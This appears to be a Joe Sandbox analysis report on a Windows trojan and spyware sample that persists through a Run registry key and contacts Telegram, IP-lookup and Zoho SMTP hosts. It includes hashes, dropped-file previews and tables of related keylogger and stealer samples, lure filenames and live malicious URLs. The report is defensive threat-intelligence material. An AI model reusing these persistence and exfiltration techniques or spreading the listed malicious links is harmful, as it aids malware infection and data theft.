No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
185.230.212.164	smtp.zoho.eu	Netherlands	41913	COMPUTERLINEComputerlineSchlierbachSwitzerlandCH	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1494597
Start date and time:	2024-08-18 21:23:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	File.com.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/7@5/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 191 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:24:01	API Interceptor	39x Sleep call for process: File.com.exe modified
15:24:42	API Interceptor	161x Sleep call for process: xxlooa.exe modified
15:25:31	API Interceptor	417x Sleep call for process: AddInProcess32.exe modified
20:24:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run xxlooa C:\Users\user\AppData\Roaming\xxlooa.exe
20:24:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run xxlooa C:\Users\user\AppData\Roaming\xxlooa.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Remington.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	DHL Receipt_4977049980.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.3020.22248.26000.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.3020.2303.6141.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	01_extracted.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	651d356971d645a45e69342612a4cbf9017f4505ec7cf3716636209022095f33_payload.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	OMSG2024080890D-KHOJALY-LANSHAN.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	QGDQf1BhS2.exe	Get hash	malicious	Go Injector	Browse
	fx7X1yopEm.exe	Get hash	malicious	Go Injector	Browse
	Remittance Advice.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	moerk56500104990.exe	Get hash	malicious	Snake Keylogger	Browse
	Payment Invoice PI#PA0092234121.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	REQUEST FOR QUOTATION.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	Proforma Invoice- Middle East Construction Materials 2024-13-8-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	5f4w2zwBxY.exe	Get hash	malicious	Go Injector	Browse
	ObFK0mbscH.exe	Get hash	malicious	Go Injector	Browse
	RhXzTSbBN4.exe	Get hash	malicious	Go Injector	Browse
188.114.97.3	S#U0435tup.exe	Get hash	malicious	Cryptbot	Browse	neintyy19sb.top/v1/upload.php
	Official Salary for the Month of August 2024 - NU1622662404290592.exe	Get hash	malicious	FormBook	Browse	www.eraplay88rtpgacor.lat/pt46/?Cj90E=2U5FQK94ZXdB/CZGbEmAqiVYM6OiqGkb5XXzbZC/PxdEk7+YTa81A9JVSB2t8XsQKzff&GVWh=CdT0vvb
	FedEx Shipping Document.exe	Get hash	malicious	Azorult	Browse	l0h5.shop/CM341/index.php
	http://binanceevn.com/index/index/lang/ko-kr/Trade/tradelist	Get hash	malicious	Unknown	Browse	binanceevn.com/Verify/code
	rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.xls	Get hash	malicious	Unknown	Browse	jiourl.com/anbdld
	rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.xls	Get hash	malicious	Unknown	Browse	jiourl.com/anbdld
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/qLW2DYuh/download
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/jSVzi5ju/download
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/Ry4NfKBu/download
	http://dpd-hr.receiving-delivery.com/track/5294558215/	Get hash	malicious	Unknown	Browse	dpd-hr.receiving-delivery.com/track/5294558215/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Remittance Advice.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	moerk56500104990.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Payment Invoice PI#PA0092234121.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	REQUEST FOR QUOTATION.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Proforma Invoice- Middle East Construction Materials 2024-13-8-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	DHL Receipt_4977049580.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	D#U00c7 160. 80.ALT-1236.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	506).pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
api.telegram.org	QGDQf1BhS2.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	fx7X1yopEm.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	moerk56500104990.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Payment Invoice PI#PA0092234121.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQUEST FOR QUOTATION.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Proforma Invoice- Middle East Construction Materials 2024-13-8-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	5f4w2zwBxY.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	ObFK0mbscH.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	RhXzTSbBN4.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
smtp.zoho.eu	Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.212.164
	Orden#46789_2024_Optoflux_mexico_sderlss.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	Orden#46789_2024_Optoflux_mexico_sderlsTY.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	Orden#46789_2024_Optoflux_mexico_sderlsTYP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	185.230.214.164
	okPY77wv6E.exe	Get hash	malicious	AgentTesla	Browse	185.230.214.164
	RFQ678903423_PROD_HASUE_de_Mexicso_MAT_MEX.exe	Get hash	malicious	AgentTesla	Browse	185.230.214.164
	RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe	Get hash	malicious	GuLoader	Browse	185.230.214.164
	RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe	Get hash	malicious	AgentTesla	Browse	185.230.214.164
	INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exe	Get hash	malicious	AgentTesla	Browse	185.230.214.164
	VBG dk Payment Receipt --doc87349281.bat	Get hash	malicious	Remcos, AgentTesla, DBatLoader	Browse	185.230.214.164
checkip.dyndns.com	Remittance Advice.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	moerk56500104990.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Payment Invoice PI#PA0092234121.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	REQUEST FOR QUOTATION.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Proforma Invoice- Middle East Construction Materials 2024-13-8-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	DHL Receipt_4977049580.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	D#U00c7 160. 80.ALT-1236.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	506).pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	QGDQf1BhS2.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	fx7X1yopEm.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	moerk56500104990.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Payment Invoice PI#PA0092234121.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQUEST FOR QUOTATION.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Proforma Invoice- Middle East Construction Materials 2024-13-8-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	5f4w2zwBxY.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	ObFK0mbscH.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	RhXzTSbBN4.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
CLOUDFLARENETUS	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	SecuriteInfo.com.Trojan.InjectNET.17.22691.19885.exe	Get hash	malicious	LummaC	Browse	172.67.158.159
	S#U0435tup.exe	Get hash	malicious	Cryptbot	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC, Go Injector	Browse	104.21.69.39
	S#U0435tup.exe	Get hash	malicious	Cryptbot	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC, Go Injector	Browse	104.21.69.39
	O6qi7Kconr.exe	Get hash	malicious	LummaC, Go Injector	Browse	172.67.215.117
	JGgj4TOU7R.exe	Get hash	malicious	LummaC, Go Injector	Browse	172.67.192.52
	https://eu5qwt3o.beauty/offer/4?imp=amakyvlljhftr1723918476202&rurl=https%3A%2F%2Fgentlyrevitalizedarchitect.com%2F%3Fa%3D103098%26c%3D143007%26s1%3D79%26s2%3Damakyvlljhftr1723918476202%26s3%3Dwww.foxnews.com	Get hash	malicious	Unknown	Browse	104.18.28.127
	Official Salary for the Month of August 2024 - NU1622662404290592.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
UTMEMUS	Payment Invoice PI#PA0092234121.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Proforma Invoice- Middle East Construction Materials 2024-13-8-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	http://vztel.pgslotmx.com/4LzXXV15833BwEh1411pqqjcszogu14462TQIECUFXUJQCTZS286RSWC17492j17	Get hash	malicious	Unknown	Browse	132.226.214.62
	D#U00c7 160. 80.ALT-1236.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Remington.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	hesaphareketleri.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
CLOUDFLARENETUS	file.exe	Get hash	malicious	Babadeda	Browse	172.64.41.3
	SecuriteInfo.com.Trojan.InjectNET.17.22691.19885.exe	Get hash	malicious	LummaC	Browse	172.67.158.159
	S#U0435tup.exe	Get hash	malicious	Cryptbot	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC, Go Injector	Browse	104.21.69.39
	S#U0435tup.exe	Get hash	malicious	Cryptbot	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC, Go Injector	Browse	104.21.69.39
	O6qi7Kconr.exe	Get hash	malicious	LummaC, Go Injector	Browse	172.67.215.117
	JGgj4TOU7R.exe	Get hash	malicious	LummaC, Go Injector	Browse	172.67.192.52
	https://eu5qwt3o.beauty/offer/4?imp=amakyvlljhftr1723918476202&rurl=https%3A%2F%2Fgentlyrevitalizedarchitect.com%2F%3Fa%3D103098%26c%3D143007%26s1%3D79%26s2%3Damakyvlljhftr1723918476202%26s3%3Dwww.foxnews.com	Get hash	malicious	Unknown	Browse	104.18.28.127
	Official Salary for the Month of August 2024 - NU1622662404290592.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
COMPUTERLINEComputerlineSchlierbachSwitzerlandCH	https://forms.zohopublic.eu/oyika/form/OfficeAdministration/formperma/9Y9iItPBjtbizq-LjIqfCLG9lgQgDpYgginS586dnzM	Get hash	malicious	Unknown	Browse	89.36.170.147
	http://workdrive.zohoexternal.com	Get hash	malicious	Unknown	Browse	89.36.170.147
	https://workdrive.zohoexternal.com/external/writer/46fdf68b2f78265d07797e09c63aeef4064c3374cfc014062660688cb6876b9b	Get hash	malicious	Unknown	Browse	89.36.170.147
	https://diverescueintl.com/	Get hash	malicious	HTMLPhisher	Browse	89.36.170.147
	3533cdbe-ace4-ee24-ff8f-a6fbfe7cf297.eml	Get hash	malicious	HTMLPhisher	Browse	89.36.170.147
	https://news.sky.com.orientcomputer-eg.com/ck1/13ef.6f604c137186924e/54afeda0-5892-11ef-9169-52540048feb1/4a9c32796a4b334297d499ea9c8416521e40b10f/2?e=aIojADma7UHO6n8luDK%2B95xpBNzB5MYBKYeLZ8ZyOu7Aa%2B6p9nC2pijHnhlTxVAZYdVpf6NA96PWWwLveY4KCWpHNDDXbTiOTMiFzovH6LYW6dQ7e4qpdVuaSUp1wm%2By%2FblAF1x6nrjyRRXVcXQOIfo7%2BYq07nWhOzN%2FpZd%2FKYo7PgcoYOZcAKUuxCBOV5egyrKv2HeOtQXceIDZKjV7YQ%3D%3D	Get hash	malicious	Unknown	Browse	185.230.212.59
	https://survey.zohopublic.com/zs/PYD30j?zs_inviteid=866013344e2f6aaa30b0ce407809ff4bd0ed3ef0b6c505e4b8ed99944a376aa9926823bc48ddf2b3a48337595fd132fdc7dd78d5f9b555e70f8018a33749ece953593d840363543c7e497cb3df5edd8a8ce77772c184384877cf08b30c571942a82188865861cee4768abdb6a85121effaf9893caa395668bdc7d2ea3eb1ad70842f3852386887fd2152473c96af2d214aa22073b82ef4bd897283936adbc27354514f9b6787d1b60b4d554452880bf6	Get hash	malicious	Unknown	Browse	185.230.212.52
	https://www.netrust.net/resources/downloads/	Get hash	malicious	Unknown	Browse	89.36.170.147
	i2RndFIwSG.lnk	Get hash	malicious	DcRat, PureLog Stealer, Remcos, zgRAT	Browse	185.230.212.169
	https://workdrive.zohopublic.eu/file/1n0t05e999a7f921c44b69aef1f2423b63f55	Get hash	malicious	Unknown	Browse	185.230.212.11

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Remittance Advice.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	moerk56500104990.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3 188.114.96.3
	Payment Invoice PI#PA0092234121.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	REQUEST FOR QUOTATION.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	Proforma Invoice- Middle East Construction Materials 2024-13-8-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	DHL Receipt_4977049580.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
	D#U00c7 160. 80.ALT-1236.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3 188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	QGDQf1BhS2.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	fx7X1yopEm.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	(PO354364.scr.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	moerk56500104990.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	PO 4500118077.pdf.exe	Get hash	malicious	FormBook	Browse	149.154.167.220
	BALANCE PAYMENT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	BALANCE PAYMENT.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Payment Invoice PI#PA0092234121.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REQUEST FOR QUOTATION.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\File.com.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
MD5:	EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
SHA1:	B2A052ACB64FC7173E568E1520AA4D713C5E90A3
SHA-256:	50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
SHA-512:	D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xxlooa.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\xxlooa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
MD5:	EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
SHA1:	B2A052ACB64FC7173E568E1520AA4D713C5E90A3
SHA-256:	50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
SHA-512:	D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Roaming\xxlooa.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2387968
Entropy (8bit):	7.793712824949678
Encrypted:	false
SSDEEP:	49152:64ryFkp8Y4N1Pq3FKHv6T0x5E/aHJEt05iR:6qrpddVBTv
MD5:	8B4E3A62D01F4D0CF638607B5E7FB2A1
SHA1:	7AF22D0699C5D98422672B502E3BDFEC4D67CE96
SHA-256:	4187407E94E390B8916206E2714B4941CACD06C60F9A8662F41B847CAB5F2D5F
SHA-512:	D0D7279583395EEB463E80E5AD065D95898198D6901E7AE922B939E11276C9A86BD2C3AEE67F62675E524509E56079C8A9628056A56054DDFB3A7211C3294D30
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45% Antivirus: Virustotal, Detection: 49%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8..W.................Z$..........w$.. ....$...@.. ........................$...........`..................................w$.S.....$.......................$...................................................... ............... ..H............text....X$.. ...Z$................. ..`.rsrc.........$......\$.............@..@.reloc........$......n$.............@..B.................w$.....H.......D.#.d................2".............................................D........E......N........T..J.......)...........J...V.......k$..uv...B..%Y..H8..[j.....$v..0........w..v....].............-Q...-..........."...l...x..~E...=... ..I....................&..B......8............U......6..\j..mn...'.........@...............Q...fm...`..K....2..I...U...............^.......)............F...Q..3J.....YC..z............E..b...7=..J...YD...p.....IP..(*..........J.......~?..

C:\Users\user\AppData\Roaming\xxlooa.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1264
Entropy (8bit):	4.789031012559928
Encrypted:	false
SSDEEP:	12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeT0smtCNEAFSkIrxMVR:/GVAokItULVDv
MD5:	B569E93A0C3ACC19FEEEA2980812D728
SHA1:	7D4E374FD13712AAE669F2AE814E65EDBEA9470E
SHA-256:	655C106A1E9228CA3494BC1A51450E4B428337C04939A6114E6017D510B99AD0
SHA-512:	2DB4D51A21D48D3316721A43472DE8507286262B88E0992EE0A3A3E4381A0078155CFD07DCF99EC908EF214450167767FA40A6B57E66A9F897958E83867DA914
Malicious:	false
Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms 